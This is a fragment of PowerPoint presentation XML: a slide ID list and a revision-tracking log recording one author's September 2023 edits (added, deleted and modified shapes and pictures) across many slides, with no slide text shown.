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3" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="288" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="298" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="264" r:id="rId10"/>
    <p:sldId id="266" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="322" r:id="rId14"/>
    <p:sldId id="295" r:id="rId15"/>
    <p:sldId id="296" r:id="rId16"/>
    <p:sldId id="299" r:id="rId17"/>
    <p:sldId id="286" r:id="rId18"/>
    <p:sldId id="292" r:id="rId19"/>
    <p:sldId id="267" r:id="rId20"/>
    <p:sldId id="271" r:id="rId21"/>
    <p:sldId id="269" r:id="rId22"/>
    <p:sldId id="272" r:id="rId23"/>
    <p:sldId id="260" r:id="rId24"/>
    <p:sldId id="275" r:id="rId25"/>
    <p:sldId id="284" r:id="rId26"/>
    <p:sldId id="285" r:id="rId27"/>
    <p:sldId id="314" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="315" r:id="rId30"/>
    <p:sldId id="268" r:id="rId31"/>
    <p:sldId id="262" r:id="rId32"/>
    <p:sldId id="276" r:id="rId33"/>
    <p:sldId id="302" r:id="rId34"/>
    <p:sldId id="304" r:id="rId35"/>
    <p:sldId id="316" r:id="rId36"/>
    <p:sldId id="305" r:id="rId37"/>
    <p:sldId id="309" r:id="rId38"/>
    <p:sldId id="308" r:id="rId39"/>
    <p:sldId id="317" r:id="rId40"/>
    <p:sldId id="310" r:id="rId41"/>
    <p:sldId id="318" r:id="rId42"/>
    <p:sldId id="311" r:id="rId43"/>
    <p:sldId id="319" r:id="rId44"/>
    <p:sldId id="312" r:id="rId45"/>
    <p:sldId id="323" r:id="rId46"/>
    <p:sldId id="324" r:id="rId47"/>
    <p:sldId id="313" r:id="rId48"/>
    <p:sldId id="320" r:id="rId49"/>
    <p:sldId id="279" r:id="rId50"/>
    <p:sldId id="281" r:id="rId51"/>
    <p:sldId id="303" r:id="rId52"/>
    <p:sldId id="321" r:id="rId53"/>
    <p:sldId id="283" r:id="rId54"/>
    <p:sldId id="28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E3116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1989C-53CF-41F2-9D05-A6DF9CACECAC}" v="312" dt="2023-09-29T19:38:42.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6" y="5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4781989C-53CF-41F2-9D05-A6DF9CACECAC}"/>
    <pc:docChg chg="undo custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T20:23:07.104" v="11431" actId="6549"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T00:36:21.751" v="69" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1325061211" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T00:36:21.751" v="69" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1325061211" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:32:04.619" v="3936" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2201572609" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T00:38:18.101" v="74" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2201572609" sldId="257"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:32:04.619" v="3936" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2201572609" sldId="257"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T13:23:06.236" v="576" actId="108"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="450669007" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T00:52:01.412" v="164" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669007" sldId="258"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T13:23:06.236" v="576" actId="108"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669007" sldId="258"/>
            <ac:spMk id="6" creationId="{112844C9-97ED-8287-C1FE-0533ACEB4D57}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T01:04:00.919" v="226" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669007" sldId="258"/>
            <ac:picMk id="3" creationId="{F913C573-F294-1000-656D-48C006A63D7F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T01:11:17" v="280" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="450669007" sldId="258"/>
            <ac:picMk id="8" creationId="{DFEE711C-E350-C917-4D7D-4C1AD3CDD8CE}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T14:42:36.984" v="585" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3429415671" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T14:42:36.984" v="585" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3429415671" sldId="259"/>
            <ac:spMk id="6" creationId="{4189D694-2BB2-30A9-F911-C341AB2D283B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T01:56:12.563" v="371" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3429415671" sldId="259"/>
            <ac:picMk id="3" creationId="{F2830658-D911-7E0D-EC7B-7AD0F78741AF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T02:05:47.087" v="373"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3429415671" sldId="259"/>
            <ac:picMk id="5" creationId="{49CBF319-B296-6B10-9253-B45C264977D3}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod ord modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:26:41.275" v="6993"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4190569356" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T21:01:56.482" v="4389" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190569356" sldId="260"/>
            <ac:spMk id="3" creationId="{25BDA276-60B9-0528-B5DF-5AB00142DA0A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T21:00:11.576" v="4375" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4190569356" sldId="260"/>
            <ac:picMk id="2" creationId="{01CB6A31-098F-0147-5072-D1CD409A82B1}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new del mod ord modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:23:27.465" v="6887" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1557082237" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:24:07.953" v="3720" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:spMk id="2" creationId="{8D9926A0-03BF-4D5F-8529-DF8AAAB6E007}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T15:28:09.847" v="2396" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:spMk id="3" creationId="{1B053F55-BE90-DC80-CA1E-5339E65959B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T01:24:43.756" v="3729" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:spMk id="10" creationId="{D4D68565-41A7-E4F3-F85C-6AC672051F50}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T20:31:02.711" v="1197" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:spMk id="14" creationId="{BA450E52-C3C5-74D3-D194-B4F10BF6CCC1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T20:28:49.609" v="1182" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:picMk id="5" creationId="{DAB01823-D7F6-7945-7A1B-78960BF4AB0E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T15:42:41.431" v="923" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:picMk id="7" creationId="{C55EA1EF-EA4A-A76A-FEDC-10E9CD767672}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T15:42:41.431" v="923" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:picMk id="8" creationId="{3B5B821C-F66A-4CD4-8DF1-9A75002DD0C7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T15:42:41.431" v="923" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1557082237" sldId="261"/>
            <ac:cxnSpMk id="12" creationId="{FB70DBF6-5B54-0726-C629-030C323CF3CA}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:07:22.120" v="9730" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3952469874" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:07:22.120" v="9730" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952469874" sldId="262"/>
            <ac:spMk id="5" creationId="{FFDB62FA-4CD7-4EE3-A0F8-000566454FCE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:06:41.148" v="9680" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952469874" sldId="262"/>
            <ac:picMk id="3" creationId="{61752F05-E1AB-748F-21A6-FD9C60257DEE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:06:41.148" v="9680" actId="1076"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952469874" sldId="262"/>
            <ac:inkMk id="2" creationId="{30006D81-3BE6-2249-F5F6-B820B45F8D28}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-29T01:06:41.148" v="9680" actId="1076"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3952469874" sldId="262"/>
            <ac:inkMk id="4" creationId="{E947B827-B9F8-B114-E223-17A0BEBC3402}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:47:07.222" v="4149" actId="6549"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2849589159" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:43:38.077" v="4077" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="2" creationId="{37D69293-E137-0A01-E1AD-5234103E8FF7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T23:56:35.537" v="1324" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="3" creationId="{37F0A203-6F68-BB81-4426-1310384A8C2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:44:05.559" v="4085" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="4" creationId="{2C000124-0A4A-3953-703C-F901995A3295}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T23:57:47.883" v="1337" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="7" creationId="{AC91129B-96CD-E554-D17B-B71F52A12512}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:01:18.824" v="1390" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="9" creationId="{FF81415C-93D2-5F92-5589-7CFF4094975E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-12T13:47:07.222" v="4149" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:spMk id="10" creationId="{427BCB36-41E6-D162-26DF-F5C037725048}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:30:16.915" v="1540" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2849589159" sldId="263"/>
            <ac:picMk id="5" creationId="{6FB37CCD-6E90-7783-C8C6-E034B36553B9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:34:31.208" v="7122" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4133766529" sldId="264"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-10T23:20:19.966" v="1255" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4133766529" sldId="264"/>
            <ac:spMk id="2" creationId="{167CF2C6-D80C-365F-B54A-1A529918F9B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T00:34:31.208" v="7122" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4133766529" sldId="264"/>
            <ac:spMk id="3" creationId="{4AE1FA33-B3D2-B69A-DB10-F54E057FA68E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout modNotesTx">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:29:50.799" v="7626" actId="700"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2420996426" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:29:50.799" v="7626" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="2" creationId="{0371794C-AD16-9821-D4C6-635AD5C5D090}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:05:48.743" v="1449" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="2" creationId="{44C4768B-759A-9D3C-D1F3-BB0A691957E5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-19T01:29:50.799" v="7626" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="3" creationId="{AAF27E9D-5025-50F7-AF9B-6D134A3CD118}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:05:48.743" v="1449" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="3" creationId="{AB1AF85F-92F0-02BD-2D03-685F6ACE5355}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:06:55.155" v="1454"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="6" creationId="{C7558866-6F08-3E00-07F5-E8E221372727}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:07:19.117" v="1460"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="7" creationId="{C3DC7FCE-3972-2537-D9B9-647631447630}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:26:26.984" v="1536" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:spMk id="8" creationId="{1F044EA3-0EAE-EC28-6AE2-70DFE343B998}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:12:07.291" v="1531" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:picMk id="5" creationId="{BB7FEC85-B02B-3294-E60C-5B02374BF9F3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-11T00:26:26.984" v="1536" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2420996426" sldId="265"/>
            <ac:picMk id="10" creationId="{9B3DF655-296B-8F88-9417-5125AA454FD7}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T23:04:50.682" v="6373" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="788267696" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{4781989C-53CF-41F2-9D05-A6DF9CACECAC}" dt="2023-09-18T23:04:50.682" v="6373" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="788267696" sldId="266"/>
            <ac:spMk id="2" creationId="{2C9CBFBF-7FF3-DE6F-997C-CB83B7387D2B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
